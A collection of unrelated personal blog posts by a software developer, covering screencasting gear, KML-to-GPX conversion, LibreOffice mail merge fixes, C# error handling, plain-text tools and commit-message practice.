There isn't one answer to the challenge of two-stage commitments, but here are some ways to handle that initial commitment question:
- Be more circumspect in initial response, e.g. "well maybe, let's see how it looks when the paperwork arrives"
- Buy time: "can I get back to you on that?
- Defer: "interesting, let me know when you have something more concrete"
- Say no - maybe it was never going to be right and you could have figured that out right away.
- Say yes, but be damn sure you're going to stick to it as if it was written in blood.
I hope reading this helps you. Writing it has helped me clarify my thinking around this tricky bit of human interaction.
If you have trouble with this kind of thing then definitely check out [Untamed by <NAME>](https://www.amazon.co.uk/Untamed-Stop-pleasing-start-living-ebook/dp/B082K7QXRQ), she has lots to say on setting boundaries.
<file_sep>---
layout: post
title: My Screencasting Setup
date: 2018-03-17 18:56:12.000000000 +00:00
type: post
published: true
status: publish
permalink: "/2018/03/17/screencasting-setup/"
---
I just made a video to demo schema explorer.
<iframe width="560" height="315" src="https://www.youtube.com/embed/cqStb6M-Q90" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
I did this in one take with no post-production work. I figure practice will improve my selection and delivery of the content.
Behind the scenes I used the following:
## Hardware
* Dell XPS 13 - (9350 model), using the built-in webcam (up-nose view, camera in bottom left of lid for some reason), good enough for tiny pic in corner.
* [Snowball usb mic](http://amzn.to/2FGWsQQ) (great sound quality, no worrying about analogue stuff), sat on a folded towel on my desk to deaden vibrations through the mini-tripod. The snowball has 3 settings on a switch at the back, had it on 3 - omni directional, I tested [all three modes](https://youtu.be/-3rbPaJgTWA?t=1m59s) beforehand.
* Supplied stand didn't actually fit properly, so bought an [ammoon mini tripod](http://amzn.to/2pkYEmg) instead which is lovely (importantly it has the right screw thread for the mic).
* A quiet room after everyone is in bed to avoid [interruptions](https://youtu.be/Mh4f9AYRCZY), and did the recording between rain storms!
## Software
* [Linux Mint](https://linuxmint.com/) 18.3 Cinnamon
* [Vokoscreen](http://linuxecke.volkoh.de/vokoscreen/vokoscreen.html) 2.4.0 - this handles screen recording & the picture-in-picture from the webcam
I recorded the entire screen at 1920x1080 (seeing as even phones are HD now). and uploaded it to youtube. (drag-n-drop, simplez!)
## Settings
Control panel > sound > input > snowball > about 130% input volume

fullscreen capture, display 2, 1920x1080

pulse / blue-snowball selected

mpeg4, mp3, avi, 25fps

Default config apart from save path "videopath"

Webcam switched on

## Other attempts
I spent ages finding the right software and doing test takes to get sound levels etc right.
I started off with Kazaam for recording and mplayer for the webcam onscreen video.
I got mplayer to show a borderless webcam video picture on screen that I could then use with any screen recorder, but had problems with dual screen behaviour so even though I could zoom in better I gave up on that once I'd discovered vokoscreen.
You might also want to look at [https://wistia.com/soapbox](https://wistia.com/soapbox) which I hear is very good.
<file_sep>---
layout: post
title: New year new blog
date: '2017-01-17T23:36:00.000Z'
author: <NAME>
tags: blogger-import
modified_time: '2017-01-17T23:36:03.863Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5400732084517296093
blogger_orig_url: https://timwise.blogspot.com/2017/01/new-year-new-blog.html
---
So-long blogger and thanks for all the fish.
My content to date will live on here for as long as google keep the bits spinning.
Find my new blog at [http://blog.timwise.co.uk/2017/01/17/new-year-new-blog-happy-2017/](http://blog.timwise.co.uk/2017/01/17/new-year-new-blog-happy-2017/) which will live for as long as I pay wordpress.com's bills and don't screw up my DNS config.
See y'all on the other side. Don't forget to subscribe to the new RSS feed.
<file_sep>---
layout: post
title: Converting kml to gpx with python
date: '2014-02-03T20:27:00.000Z'
author: <NAME>
tags:
modified_time: '2014-02-03T20:29:19.425Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6598892897913494731
blogger_orig_url: https://timwise.blogspot.com/2014/02/converting-kml-to-gpx-with-python.html
---
Today I wanted to geo-code some of my photos.
I have an SLR digital camera (no gps of course), and an android phone. I
recorded a track with [My
Tracks](https://play.google.com/store/apps/details?id=com.google.android.maps.mytracks)
from google on the phone. (Not entirely recommended but works). I then fired up
digikam to run the geo-correlation and add lat-long to the exif of the files
only to discover [digikam doesn't know how to read
kml](http://community.kde.org/Digikam/GSoC2010/ReverseGeocoding#TODO_Later_versions).
Fooey.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/12293521763/"><img
src="https://live.staticflickr.com/3756/12293521763_39d7704c73_k.jpg" alt="people on the beach"></a>
</div>
I looked to gpsbabel, but it apparently can't handle this style of kml file, as
differentiated by the coordinates being in the following style of markup:
<gx:Track>
<when>2014-01-25T18:00:13.955Z</when>
<gx:coord>-1.885348 50.769434</gx:coord>
<when>2014-01-25T18:00:14.565Z</when>
<gx:coord>-1.885193 50.769328 53.20000076293945</gx:coord>
<when>2014-01-25T18:00:58.566Z</when>
So I wrote a python script to munge it into gpx shape:
<script src="https://gist.github.com/timabell/8791116.js"></script>
This can be run as follows:
./kmlToGpx.py "25-01 12-48.kml" > "25-01 12-48.kml.gpx"
And worked a treat for me.
After I'd done this I discovered my pet tool
[gpsprune](http://activityworkshop.net/software/gpsprune/index.html) can open
the new style kml. (I [forked gpsprune](https://github.com/timabell/gpsprune) a
while ago and added a minor feature) However I'm glad to have a command-line
tool as I have hundreds of tracks I want to convert.
Incidentally the phone can automatically sync the tracks to google drive, which
is kinda handy and then you can download them from the site etc.
<file_sep>---
title: "article: Windows rapidly approaching desktop usability!"
date: 2005-12-07
slashdot_url: https://slashdot.org/journal/123764/article-windows-rapidly-approaching-desktop-usability
---
<p>There have been many articles on the merits of linux based systems from the perspective of windows users. Now the tables are turned in this excellently written article. If you have read previous "linux versus windows" tests you will recognise the style and approach, and how it affects the conclusions reached.</p>
<p><a href="http://os.newsforge.com/article.pl?sid=05/05/18/2033216&tid=149">http://os.newsforge.com/article.pl?sid=05/05/18/2033216&tid=149</a></p>
<file_sep>---
title: Time to "Shape Up" your SCRUM processes? The new thing from Basecamp
layout: post
---
Basecamp, who are famous for carving out their own path in the software world
have documented and shared their own way of defining and building their
software-as-a-serice (SaaS) product, also known as "basecamp". You can read the
whole thing here: <https://basecamp.com/shapeup>.
If like me you've mostly worked with SCRUM/Agile/Kanban style teams you should
pay attention to the ideas they share. Unlike many people who teach and follow
the wikipedia truth of SCRUM as *the* way of building software, basecamp have
not satisfied themselves with cargo-culting "industry best practice" and have
instead carefully honed their own particular way of getting the best out of
their resources.
Although the "ShapeUp" process is finely tuned to suit basecamp, there are many
things in there that the average SCRUM team could take inspiration and
improvement from without throwing out everything in place at the moment. An
example I particularly like is the way everyone can bring a pitch to the
betting table, from their own personal backlog of priorities, contrasted with
the usual approach of throwing yet another another card/story onto the
team-shared dumpster-fire of a backlog / todo-list and hoping it somehow
magically gets to the top of the list just before all your chickens come home
to roost.
----
# Key features of shaping up
## Shaping
* An iterative process of taking concepts from initial idea to something that
could be built with bounded risk and expectations.
* A largely solo or pair exercise, but done in consultation with experts on the
wider team.
## Pitch
* The output of shaping.
* A detailed but high-level document outlining what should and shouldn't be
built, with room for discretion and design work by the designers and
programmers.
## Bets
* There is a meeting where pitches are discussed, prioritised and scheduled for
the next cycle of work, they "take a bet" on a pitch.
* If a pitch blows its timebox, then the default is always to stop and it
doesn't get any special priority in the next cycle. This limits the risk of
runaway unstoppable projects.
## 6-week cycle with gaps
Basecamp operate a 6-week period of building what was decided in shaping and
betting. This can either be one 6 week bet or set of 2 week bets.
Once this is done there is a 2-week gap where people can do maintenance, tech
debt paydown, plan new things etc.
----
If you'd like to hear a bit more about ShapeUp, have a listen to
<https://pod.timwise.co.uk/5> where I go over their process in a bit more
detail with regular co-host David.
I've also written up a nice approach to avoiding a "backlog of doom" in my
[personal backlogs post](/2020/06/30/personal-backlogs/).
<file_sep>---
layout: post
title: LibreOffice mail merge - "data source 'SOURCE' was not found"
date: '2015-01-12T22:31:00.002Z'
author: <NAME>
tags:
modified_time: '2015-02-26T00:51:32.105Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3978505848471658988
blogger_orig_url: https://timwise.blogspot.com/2015/01/libreoffice-mail-merge-data-source.html
---
So another year on, LibreOffice 4.2.7.2 (via Linux Mint 17.1) still has a dog's breakfast of a mail merge feature, hey ho, hopefully it might actually get fixed following the fork from OpenOffice and the change in contribution methods.
Anyways
So I've moved machines, copied my files across and for some reason my mail merge has soiled itself and now bleats _"data source 'SOURCE' was not found"_ which is as unhelpful as it is infuriating, especially given that the "check connections" button is exactly the wrong place to look for an answer.
Turns out you actually get this if even just a single field in your document is 'broken'. How do you tell which ones are broken? Well you have to change them all to just be sure. Sigh.
The fix for me today was as follows (though with such a messy feature there's unlimited ways it can break):
1. Hit F4 and check that your connection to the spreadsheet actually exists and works, and unbreak anything you find therein. While you're in there you can marvel at how it requires a whole other file (.odb) just to remember how to get to a spreadsheet. (See below for fixing this)
2. Turn on the field names so you can see what the f*** is actually going on with "_View > Field Names (ctrl+f9)_" which will show you the fully qualified field name, which might even be completely wrong. You can now see that for whatever reason (insanity?) it embeds more than just the field name at the field place-holder.
3. And finally the way you actually fix the broken fields it's failing to tell you about actually lies under the menu item "_Edit > Fields_", where you can change all the broken references one at a time to the correct place.
4. For bonus points, if it the field looks right but is silently broken somehow then you have to change the field to something else, hit okay, and then change it back again for anything to actually change, which is annoying if you have a lot of fields.
Fragile much?
Another fix I've just discovered is you can rename your data source to match the name defined in the fields (assuming they're all the same) and it'll start working again.
#### Fixing the .odb file
If you're stuck on point 1, here's how you fix it, also completely non-obvious and full of apparent dead-ends and dubious information.
1. Give up on trying to do this in writer, it doesn't seem possible, in spite of false hope from the data sources tool, it only allows you to select .odb (database) files, not spreadsheets.
2. Open up "libreoffice base", which pops open the database wizard
3. Choose "connect to an existing database"
4. In the dropdown choose "Spreadsheet"
5. Next
6. Browse for your spreadsheet
7. Next
8. Leave "register database for me" selected
9. Leave "open the database for editing" checked
10. Finish
11. It prompts to save the new database (.odb), I suggest saving it in the same folder as the spreadsheet to save future confusion.
12. You now have the database open in "base", you should see your spreadsheet sheets listed as tables
13. Open a table (i.e. a sheet) and check you can see the spreadsheet contents
14. Close "base", saving changes
15. Return to your writer document
16. Open the data sources again (F4), you should now be able to browse your spreadsheet via your newly created database.
Simpler than getting planning permission out of a vogon. :-/
Hope that helps some other poor open source die-hard who has work to do.
Useful refs:
* [http://davidmburke.com/2011/08/10/mail-merge-in-libreoffice/](http://davidmburke.com/2011/08/10/mail-merge-in-libreoffice/)
* [https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=29708](https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=29708)
* [https://www.libreoffice.org/bugzilla/buglist.cgi?quicksearch=mailmerge](https://www.libreoffice.org/bugzilla/buglist.cgi?quicksearch=mailmerge)
* [http://ask.libreoffice.org/en/question/19590/can-you-import-a-libreoffice-calc-spreadsheet-into-a-libreoffice-database/](http://ask.libreoffice.org/en/question/19590/can-you-import-a-libreoffice-calc-spreadsheet-into-a-libreoffice-database/)
<file_sep>---
title: "b3ta teddy"
date: 2004-10-24
slashdot_url: https://slashdot.org/journal/87958/b3ta-teddy
---
<p>this is great<br><a href="http://www.parachutingtrees.co.uk/rushmore.htm">http://www.parachutingtrees.co.uk/rushmore.htm</a><br>sound required</p>
<file_sep>---
layout: post
title: The BBC and the bouncing emails
date: '2012-01-25T21:22:00.001Z'
author: <NAME>
tags:
modified_time: '2012-01-25T21:22:26.819Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3790910591580830225
blogger_orig_url: https://timwise.blogspot.com/2012/01/bbc-and-bouncing-emails.html
---
For the record, this is the staggering response I received from the BBC's iPlayer support when I helpfully let them know that the email address they use as sender when responding to feedback sent through their support web form is non-deliverable.
I think it speaks for itself. You would at least think they would set the sender address to "<EMAIL>" so you wouldn't waste time composing a response. And if you've been through the web form, you will know that filling it out once is okay, but to use it to reply? Give over!
> -------- Original Message --------
> Subject: BBC iPlayer - Case number CAS-1258137-Q271CZ
> Date: 24 Jan 2012 10:19:09 +0000
> From: <EMAIL>
> To: <NAME>
>
> Dear <NAME>
>
> Reference CAS-1258137-Q271CZ
>
> Thank you for contacting the BBC iPlayer support team.
>
> I understand you’re unhappy that the reply email you had sent to our email bounced.
>
> I’m afraid it is not possible to reply to our email because we deal with over a million audience contacts every year and we have to ensure they can be efficiently tracked using our handling system and therefore for every correspondence you need to fill the webform. In addition, our complaints, BBC iPlayer and general enquiries webforms ask for essential information such as channel, programme name and transmission date which means we don't have to write back to people unnecessarily. Using a webform also guarantees we can match a return contact up with the previous contact from that person without the need to cross-check thousands of unformatted emails which would then have to be manually transferred into the tracking system.
>
> We try to restrict public email inbox addresses where possible because we receive millions of 'spam' e-mails and a return email address would attract and generate even more. Junk mail costs the BBC a considerable amount of money because every email has to be checked before we can delete them as it’s not always easy to distinguish them from a genuine email.
>
> I appreciate this may be annoying, but we did not take this decision lightly. Our policy takes into account what is operationally efficient and avoids the need to employ additional staff to process incoming emails. I would therefore ask that you please follow the instructions in the reply you received and use our online form at www.bbc.co.uk/complaints. Your email will then be passed to a member of our team for further investigation and reply.
>
> Once again thank you for contacting BBC iPlayer.
>
> Kind Regards
> <NAME>
> BBC Audience Services
> www.bbc.co.uk/iplayer
>
> NB This is sent from an outgoing account only which is not monitored. You cannot reply to this email address but if necessary please contact us via our webform quoting any case number we provided.
And here is the bounce, so you can see why I thought they had made a mistake:
> Subject: Undelivered Mail Returned to Sender
> Date: Sat, 21 Jan 2012 07:42:07 -0500 (EST)
> From: MAILER-DAEMON (Mail Delivery System)
> To: <EMAIL>
>
> This is the Postfix program at host mxout-07.mxes.net. I'm sorry to have to inform you that your message could not be delivered to one or more recipients. Here is the reason why the message could not be delivered. <<EMAIL>>: host cluster1.eu.messagelabs.com[195.245.231.99] said: 550-Invalid recipient <<EMAIL>> 550 (#5.1.1) (in reply to RCPT TO command)
<file_sep>---
title: "gimp trouble"
date: 2006-01-04
slashdot_url: https://slashdot.org/journal/125704/gimp-trouble
---
<p>I like the gimp a lot, and have been trying out some <a href="http://www.flashgimp.com/tutorials/photoshop_tutorials.php">tutorials</a>. Then it started crashing whenever I created a new image! argh! So after a bit of searching and a pointer from a <a href="http://bugzilla.gnome.org/show_bug.cgi?id=317570">bug report</a> I tried replacing the GTK+ installation I had obtained with <a href="http://gaim.sf.net/">gaim</a> with a new one from the gimp <a href="http://gimp-win.sourceforge.net/">installer page</a>. One restart later, problem solved. I like open sauce. Closed source software companies don't tend to be keen on publishing problems, even when people have resolutions to offer.</p>
<p>A small insight into Tim's life.</p>
<file_sep>---
title: "Lecture, 19th Oct"
date: 2004-10-05
slashdot_url: https://slashdot.org/journal/85935/lecture-19th-oct
---
<p>The University of Reading Public Lecture Series 2004-2005<br><a href="http://www.rdg.ac.uk/publiclectureseries/copyright.htm">http://www.rdg.ac.uk/publiclectureseries/copyright.htm</a></p>
<p>Anyone else interested in coming? This is quite close to my work and is of particular interest to me. Txt me if you like cheese. (non sequitur)</p>
<p>Tim</p>
<file_sep>---
layout: post
title: Bash command line editing cheat sheet
date: '2014-02-10T18:33:00.000Z'
author: <NAME>
tags:
modified_time: '2014-02-10T18:39:49.408Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2819214199329621667
blogger_orig_url: https://timwise.blogspot.com/2014/02/bash-command-line-editing-cheat-sheet.html
---
[https://www.gnu.org/software/bash/manual/bashref.html#Readline-Interaction](https://www.gnu.org/software/bash/manual/bashref.html#Readline-Interaction)
* **ctrl-a/e** start/end of line
* **alt-f/b** forward/back a word
* **ctrl-w/alt-d** delete to start/end of word
* **alt-.** add argument from previous command (repeat to cycle) - love this one
* **ctrl-shift-_** undo (i.e. ctrl-underscore)
* **ctrl-y** paste (yank) deleted text
* **alt-y** paste older deleted text instead
* prefix with **alt+digit** (0-9) to do multiple, e.g. delete two words
* start with **alt-minus** to go backwards
Just a few notes I threw together for my own benefit. I finally got around to learning a bit more about editing commands on the Linux shell / terminal.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/11937840106/"><img
src="https://live.staticflickr.com/3808/11937840106_51c5d9f170_k.jpg" alt="Photo of flooded River Thames at Henley, half-submerging the benches of the Angel pub"></a>
</div>
<file_sep>---
title: Exceptions vs Wrapper Return Types
layout: post
---
## The possibilities
Here are two ways you can deal with something going wrong in your code in C#:
### Exceptions
```C#
public int GetAnswer()
{
if (someDependency.HasWhatWeNeed() is false)
{
throw new Exception("someDependency didn't supply what we needed");
}
return someDependency.Something() * 42;
}
```
### Returning failure
```C#
public Result<int> GetAnswer()
{
if (someDependency.HasWhatWeNeed() is false)
{
return Result("someDependency didn't supply what we needed");
}
return Result(someDependency.Something() * 42);
}
public class Result<T>
{
public readonly T Value;
public readonly string Error;
public Result(T value) { Value = value; }
public Result(string error) { Error = error; }
//...
}
```
(This is just a stub example of Result to illustrate what I'm talking about. A real Result type would need more a bit more thought than this. You could potentially use [OneOf](https://github.com/mcintyre321/OneOf) for your error return types.)
## Context
For most of C#'s life as a language exceptions have been a pretty normal way of getting things done.
For a web system, it's a common pattern to throw any time things aren't in place to proceed for any reason, and then have a broad catch in middleware that turns it into a sensible 500 exception and logs the exception to somewhere for troubleshooting.
Meanwhile other languages and paradigms have been learning from the real-world challenges of this approach and have been downplaying the role of exceptions for normal coding. In golang multiple-returns are used, with panic reserved for truly irrecoverable problems (e.g. out of disk space). In Rust normal error handling is done with [Options and Result types](https://dev.to/cthutu/rust-3-options-results-and-errors-part-1-4d52), and again has a less commonly used panic capability for catastrophic situations.
## Pros and Cons
Specifically within C# here's the reasons that would push you to chose one or the other approach:
### Exceptions
### In favour of exceptions
1. Minimal code required
2. Includes stack trace by default
### Against exceptions
1. More expensive than normal control of flow.
2. It is not possible to tell from looking at the GetAnswer() function signature whether the programmer expected this to fail under any circumstances, or whether it's something that can be relied on.
## Error Return types
### In favour of Error return types
1. Clear indication to reader that the author knew that this function could fail under known circumstances.
2. In the long run systems that rely heavily on exceptions eventually become a losing battle of endless exceptions in logs that never truly get dealt with and you can't tell the catastrophic urgent ones apart from the run-of-the-mill bearable problems. (I'm thinking support of production web systems here)
3. Forces a more thoughtful approach to failure modes of the system.
4. Marginal performance gain - only relevant for hot-path areas, trivial compared to optimising database/network/io areas.
5. Expression of intent: by throwing an exception the programmer is indicating "I never expected this to happen!!", by using an error return the programmer is saying "I know this can happen, but I can't carry on and the caller needs to deal with it."
### Against Error return types
1. More boilerplate code (because C# doesn't support this natively like Rust does)
2. Need to explain pattern to C# programmers who are used to relying on Exceptions
## How to choose
### Web systems & microservices
An illustrative example is a microservice having to handle being misconfigured:
* if all is well the system will be configured correctly
* misconfiguration can cause a system to fail
* the code can be expected occasionally have to deal with receiving bad config
Systems consist of many concentric circles, a library is used by a single web service, which is part of a microservices architected platform etc etc.
If a single web service throws an exception, it should indicate:
* that there is a programming error such as an unhandled enum value in a switch statement, or
* complete system failure in the microservice (e.g. out of memory/disk)
The case where the system is misconfigured should be handled without using an exception, but instead use error-return types to indicate that it is unable to perform its duties due the bad configuration it has been fed, rather than something unexpected going wrong.
### A rule of thumb
From my experience the heuristic to use is:
Restrict exceptions to all-gone-to-shit tear-the-stack-down-and-bail type failures.
Use return type errors to pass problematic conditions to callers to handle for anything your particular piece of code could reasonably be expected to have to deal with (bad inputs etc).
## A wealth of expressive options
Another way to think about this choice is that if you only ever use Exceptions, or conversely if you only ever use return types to indicate failure you are missing out on a richer way of expressing your intent in code.
By using only exceptions your medium for expression is limited to:
1. Fail -> throw Exception
2. Success
By adding return type failures you have a third way to express yourself, allowing a richer communication with fellow programmers:
1. Catastrophic unexpected fail -> throw Exception
2. Fail that could be reasonably expected -> return error type
3. Success
Why would we opt out of any one of theses dogmatically as an absolute rule? The all have their place, even if we can argue and bike-shed endlessly about where to draw the lines.
There is value in consistency within a particular project with its own set of good tradeoff choices to be made. Do discuss the tradeoffs here with your team, and come to a consensus as to how you want to use these alternatives consistently withing your own project(s).
## Summary
1. Throw exceptions for thinks that should never happen if the code is correct and the host computer is functioning properly (unhandled enum in switch statement, out of memory)
2. Return error types for all failure modes that could be reasonably expected (missing config, dependent microservices down etc).
## Are you sure?
Not entirely, this is my best attempt at figuring out this issue having listened to others. There's still a bit of me that things that maybe exceptions are actually fine, are less code, and where we need to deal with specific conditions we can throw and catch custom exceptions seamlessly bypassing layers of code. I think that's probably my resistance to change and learning kicking in, and I trust that golang and Rust really are learning from the failures of Java and C# in this arena both in terms of performance and in terms of writing reliable and supportable systems.
<file_sep>---
title: Text-based tools - the ultimate format for everything
layout: post
---
Having lived in the world of technology for two to three decades now, I've come to a fundamental truth: text formats are **the ultimate** format.
> "text formats are **the ultimate** format"
>
> ~ Me, just now
It's funny really because for everything we've invented, of every level of complexity, usability, shinyness etc, when it comes down to it, texts is still king, just like it was in 1980 when I was still learning to talk.
## Properties of text formats
Things that make text inevitably superior to all other more complicated formats:
- Simple - **nothing** to go wrong.
- Use any text editor you like - vim, [vscode+vim](https://marketplace.visualstudio.com/items?itemName=yzhang.markdown-all-in-one), [intellij+vim](https://plugins.jetbrains.com/plugin/164-ideavim) are my gotos, but there are soooo many.
- Sync, backup and restore are trivial - try as they might, nothing beats a folder-tree of text files.
- They are ultimately portable - no change in technology (windows to linux, desktop to cloud, laptop to mobile) requires you to change anything, text is text, just copy them across and carry on, the ultimate defense against the ever-present pernicious vendor-lockin.
- Conflict resolution is always possible - edited two out of sync copies? No problem, there's a plethora of tools ([kdiff3](https://kdiff3.sourceforge.net/) is my favourite), or you can just do it manually if you wish.
- Version control supported - text files are trivially versionable in tools like git, everything understands it and can show diffs etc.
- Simple conventions like markdown, yaml, toml, and even slightly more complicated things like json don't fundamentally break any of the above.
- With some lightweight processing and structure (noteably markdown), the same basic format can be automatically converted to a plethora of rich and beautiful forms, and with so many tools understanding formats like markdown you are spoilt for choice.
- Supports emoji - this one is more modern, but its usefulness is not to be underestimated, and thanks to utf-8 and unicode the plain-old-text-file can have rich emotions and symbols too.
- You can use all sorts of interesting tools to process text files, many from the linux cli stack such as `sed`, `grep` (or `ag`), plus full-on shell scripting to automate repetitive tasks [such as making a new blog post](https://github.com/timabell/timwise.co.uk/blob/eff17d609f862a14275c4fa0bd8319d13d59574e/new).
## Amazing things you can do with text files
The below are all things I personally swear by and use daily. I wish more things were like this.
Markdown is by far my favourite text format, and it's incredibly versatile. In my crusade to basically convert everything to plain text / markdown files having been repeatedly burnt by fancy binary formats (`.doc` anyone?). GraphViz ("dot" format) is also a notably powerful text-based system.
### Blogging
As per this blog, see ["Setting up a static website/blog with jekyll"](/2019/06/24/setting-up-a-jekyll-blog/) from 2019. No regrets there. Writing this in vim in a terminal.
### Slide decks
[reveal.js]() can parse markdown files with a sprinkling of html & css allowed inline (very handy) and turn them into stunning modern presentations with slick animations and multi-step reveals, amazing.
I was trying to create some slides in google-slides thinking that would be the quick way, ran into some bizarre formatting limitation and went hunting for alternatives. I haven't looked back, at least for things I don't need real-time collaboration on.
You can see what I managed to do with [reveal.js for the Rust Workshop](https://rustworkshop.github.io/slide-decks/) - here's one of the [source slide markdown files](https://github.com/rustworkshop/slide-decks/blob/7eb002bfc1431025b47de97fd20e163456b5d7e5/decks/rust-workshop-master/slides.md?plain=1)
### Note taking
Markdown, VSCode with some markdown plugins, maybe even a [markdown-wiki](https://marketplace.visualstudio.com/items?itemName=kortina.vscode-markdown-notes) tool. [Markor](https://f-droid.org/packages/net.gsantner.markor/) on android. [Syncthing](https://syncthing.net/) to keep them in sync across devices. Works for me, and any conflicts due to editing files out of sync is easier to deal with than [tomboy](https://wiki.gnome.org/Apps/Tomboy)'s nasty XML format (yes I know XML is text but it's still naaaasty).
### Coding
This entry is only half tongue-in-cheek. I think it's worth pointing out that programmers have, after flirting with *many* other approaches, settled on plain old ASCII as being the one-true-format for explaining to a computer (and other programmers) what the computer is supposed to be doing. Pay attention to what programmers have learnt, there is much depth here on managing vast amounts of precise information in text form. Especially if you are not a programmer or not used to text tools there is much to learn from this world. You might thing programmers are odd creatures that thrive on unnecessary complexity; nothing could be further from the truth, they (we) are *obsessive* about solving problems once and for all and being ruthlessly efficient in all things. The fact that programmer practices are seen as odd by the general public is more a sign of just how far programmers have optimised their lives away from the unthinking defaults of the masses than it is of any peculiarity of whim or culture.
### Graphs & flowcharts
The GraphViz dot format is amazing, it takes a bit of getting used to, but once you've got it then you can rearrange your flow chart with vim in a few keypresses and have the whole thing rearranged in milliseconds. Amazing.
There's even some neat web based real-time renderers:
- <https://dreampuf.github.io/GraphvizOnline/>
- <https://sketchviz.com/>
## The yucky bits
The almost-rans:
- Email's mbox format is kinda text, but due to the way it's set up is *horrible* for sync
- vcf for contacts, what happened there then?!
- ical for calendars, what a disaster, so close but yet never works, shame
- XML - nice try, turned out to be horrible in hindsight, but not before we'd written almost all software to use it (`.docx` anyone?)
The text world is a bit short on collaborative real-time editing - google-docs is still king on that one, though it would be perfectly possible for equivalent tools to be created for the above text formats and tools. Watch this space.
Crappy half-arsed implementations of markdown, looking at you Jira/Confluence/Slack (not really a problem of text, more something where we're almost there with and then crappy WYSIWIG implementations wreck it).
<file_sep>---
layout: post
title: Yet another good-commit-messages post
date: '2016-03-18T15:25:00.000Z'
blogger_orig_url: https://timwise.blogspot.com/2016/03/yet-another-good-commit-messages-post.html
---
## Why you should care about writing good commit messages
1. It is extremely likely you won't be the last person to touch this code.
1. You will forget the details of exactly why you did something after a few weeks/months/years. Be kind to your future self.
1. Source control systems out-last [access to] ticket trackers by many years (Jira, Github-projects, Trello boards, etc. etc., how many have you seen in your time working on code? A lot more than you've seen source control systems I'll wager.) A link to a ticket is not enough. Copy the relevant context from the ticket into the commit message.
1. Not everything can be deduced from the code. Even with excellent variable/function/class/module names, and beautiful refactoring, the circumstances that let to a particular design or change are lost. Good comments adding context help, but sometimes you don't want to clutter code with temporally relevant comments; the source control gives you a suitable place to keep this information locked up with your patch of the day.
1. When someone wants to know if they can delete a line of code in the future, if they can't fathom why it was put there then the only way to find out is to delete it and see what breaks. By adding context in a commit message they can use the source-control history to get that context, and then decide whether that context is still applicable.
1. You might think your code is perfect and correct and needs no explanation beyond the code itself; but what if there's a bug? Now the only documentation is the buggy code. If I come to fix your code later how do I know what it was supposed to do without going back to first principles. What algorithm or design pattern were you trying to implement? What references did you use?
1. [Chesterton's Fence](https://thoughtbot.com/blog/chestertons-fence) - understand why something is the way it is before you change it.
> "Write every commit message like the next person who reads it is an axe-wielding maniac who knows where you live" ~ unknown
## Why I care about good commit messages
For reasons of chance I've ended up more than once maintaining and extending things created by other people, many of whom had moved on from the projects and were no longer contactable.
When dealing with a piece of code that has a behaviour that is clearly causing problems for users/customers etc. sometimes I have needed to understand *why* it was that way before I could know whether it could be changed without creating even bigger problems.
Another example was a buggy and complex algorithm implementation, but no clue left as to what the algorithm being implemented was, as a result a week of reverse-engineering the maths happened that could have been saved with a simple "this is an implementation of ..." with a hyperlink or algorithm name.
With the author of the code not available to ask I'm left only with the source code and `git blame` to fathom why it's like that.
When you find the commit that added the patch and it's one of the following then you realise the author was not taking into account future maintainers:
- "wip"
- an entire fully formed set of behaviour appears in one giant commit with no explanation (perhaps copied from somewhere else)
- a mention of a ticket number from a defunct ticket tracker with no further explanation
It seems to me that it doesn't take much additional effort to rattle out a sentence or two with some context on why something is being changed for the benefit of future maintainers. Especially when it's a complex patch that maybe took more than a day to create.
Given that each line of code is read many more times than it is written it seems that being "lazy" with explanation is not delivering the highest quality output to your client/employer/project.
I, like many developers, also value speed of delivery, fast iteration, early prototypes that may get rewritten; but you can still move fast while taking a few minutes for each patch to explain it. And you have to think that just because you might throw this one away, you also might not, and you just don't know yet.
## How to make them better
There's not much for me to add on what's already been written, so read these articles on the specifics of writing good commit messages.
* <https://vip.wordpress.com/documentation/commit-messages/>
* <https://robots.thoughtbot.com/5-useful-tips-for-a-better-commit-message>
* <http://chris.beams.io/posts/git-commit/>
* <https://gds-way.cloudapps.digital/standards/git.html>
* <https://mislav.net/2014/02/hidden-documentation/>
* [Pull Request Etiquette gist by mikepea](https://gist.github.com/mikepea/863f63d6e37281e329f8) - covers pull request quality as well as individual commits
My personal additions to this list:
* A list of highlights of changes in bullets is often nice to add, think of it as a tourist's guide to your patch. It makes it easier to spot the key changes in a large diff, and can make code-reviews more effective.
* Hard-wrapping lines shouldn't be required, that should be an editor/display concern but unfortunately the git tooling doesn't agree so doesn't wrap anything so you might have to hard-wrap.
## Are you expecting every tiny change to be like this?
No. Some patches really don't need much explaining, e.g. re-applying default code formatting or fixing a typo; but you should always consider what context a future reader might need.
## Are your patches atomic incremental improvements
If it's hard to write a good message, it might be that you are not taking the time to craft good single-purpose commits.
## Examples of good
* <https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f076ef44a44d02ed91543f820c14c2c7dff53716> ([via reddit](https://www.reddit.com/r/linux/comments/3y6st0/funny_commit_message_in_kernel/)) - what I like about this one is:
* It adds **context** that you could never get from code (note some is repeatedly more briefly in code comments which is a good thing)
* It explains the new behaviour **in human terms**.
* It's easy to read (good quality English prose)
* <https://github.com/DFE-Digital/find-teacher-training/pull/159/commits/00e24dbc216836dd73281688491b8da355706d81> - what I like about this one is:
* It's part of a PR that is also well described & reviewed
* It adds context (about the thing that will call the endpoint added in the patch, i.e .the reason it was created)
* It mentions a PR in another repo that was a source for some of the code & ideas, yet more context for answering the question "why was this done and why is it like this?"
* The co-author is attributed (github shows this which is nice), this might give you someone to talk to about if they're still around
* It provides an outline of the patch so you don't have to parse the whole diff to get a flavour of how the patch changes behaviour. When you have a lot of patches to read because you're looking for something in the history this can be a big timesaver.
* It gives insight into why certain decisions were made about the final shape of the patch (e.g. why just /healthcheck and not /ping as well)
## Video presentations on why good history matters
Remember, your code and your commits can last a veeeeeery long time and you never know what poor soul will have to understand what you did and why years later... when you have time watch this video:
